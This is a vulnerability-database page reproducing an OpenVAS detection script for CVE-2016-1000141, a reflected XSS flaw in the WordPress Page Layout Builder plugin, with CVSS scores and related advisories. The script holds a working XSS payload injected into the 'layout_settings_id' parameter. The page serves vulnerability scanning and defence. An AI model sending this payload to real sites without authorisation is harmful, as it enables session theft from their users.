Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasCopyright (C) 2016 Greenbone AGOPENVAS:1361412562310809081
HistoryOct 25, 2016 - 12:00 a.m.

WordPress Page Layout Builder Plugin < 2.0.0 Reflected XSS Vulnerability - Active Check

2016-10-2500:00:00
Copyright (C) 2016 Greenbone AG
plugins.openvas.org
13

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

50.1%

JSON

The WordPress Page Layout Builder Plugin is prone to a reflected
cross-site scripting (XSS) vulnerability.

# SPDX-FileCopyrightText: 2016 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:wordpress:wordpress";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.809081");
  script_version("2024-05-07T05:05:33+0000");
  script_cve_id("CVE-2016-1000141");
  script_tag(name:"cvss_base", value:"4.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_tag(name:"last_modification", value:"2024-05-07 05:05:33 +0000 (Tue, 07 May 2024)");
  script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2016-11-28 19:57:00 +0000 (Mon, 28 Nov 2016)");
  script_tag(name:"creation_date", value:"2016-10-25 11:30:49 +0530 (Tue, 25 Oct 2016)");
  script_name("WordPress Page Layout Builder Plugin < 2.0.0 Reflected XSS Vulnerability - Active Check");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2016 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_wordpress_http_detect.nasl");
  script_mandatory_keys("wordpress/http/detected");
  script_require_ports("Services/www", 80);

  script_xref(name:"URL", value:"http://www.vapidlabs.com/wp/wp_advisory.php?v=358");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/93804");

  script_tag(name:"summary", value:"The WordPress Page Layout Builder Plugin is prone to a reflected
  cross-site scripting (XSS) vulnerability.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"insight", value:"The flaw is due to an insufficient sanitization of user supplied
  input via variable 'layout_settings_id' to the file
  '/page-layout-builder/includes/layout-settings.php'.");

  script_tag(name:"impact", value:"Successful exploitation will allow remote attacker to create a
  specially crafted request that would execute arbitrary script code in a user's browser session
  within the trust relationship between their browser and the server.");

  script_tag(name:"affected", value:"WordPress Page Layout Builder Plugin version 1.9.3 and probably
  prior.");

  script_tag(name:"solution", value:"Update to version 2.0.0 or later.");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");

if(!port = get_app_port(cpe:CPE, service:"www"))
  exit(0);

if(!dir = get_app_location(cpe:CPE, port:port))
  exit(0);

if(dir == "/")
  dir = "";

url = dir + '/wp-content/plugins/page-layout-builder/includes/layout-settings.php?' +
            'layout_settings_id=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C%22';

if(http_vuln_check(port:port, url:url, check_header:TRUE,
   pattern:"<script>alert\(document\.cookie\);</script>",
   extra_check:"/page-layout-builder/includes/layout-settings\.php")) {
  report = http_report_vuln_url(port:port, url:url);
  security_message(port:port, data:report);
  exit(0);
}

exit(99);

Related

wpexploit 1
wpvulndb 1
cvelist 1
nvd 1
cve 1
patchstack 1
nuclei 1
prion 1
wpexploit
wpexploit
MiniMax <= 2.0.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)
2016-04-12 00:00:00
wpvulndb
wpvulndb
MiniMax <= 2.0.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)
2016-04-12 00:00:00
cvelist
cvelist
CVE-2016-1000141
2016-10-10 20:00:00
nvd
nvd
CVE-2016-1000141
2016-10-10 20:59:18
cve
cve
CVE-2016-1000141
2016-10-10 20:59:18
patchstack
patchstack
WordPress Page Layout Builder Plugin <= 1.9.3 - Reflected XSS
2016-07-20 00:00:00
nuclei
nuclei
WordPress Page Layout builder v1.9.3 - Cross-Site Scripting
2021-09-15 10:31:01
prion
prion
Cross site scripting
2016-10-10 20:59:00

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

50.1%

JSON
Related for OPENVAS:1361412562310809081
wpexploit1wpvulndb1cvelist1nvd1cve1patchstack1nuclei1prion1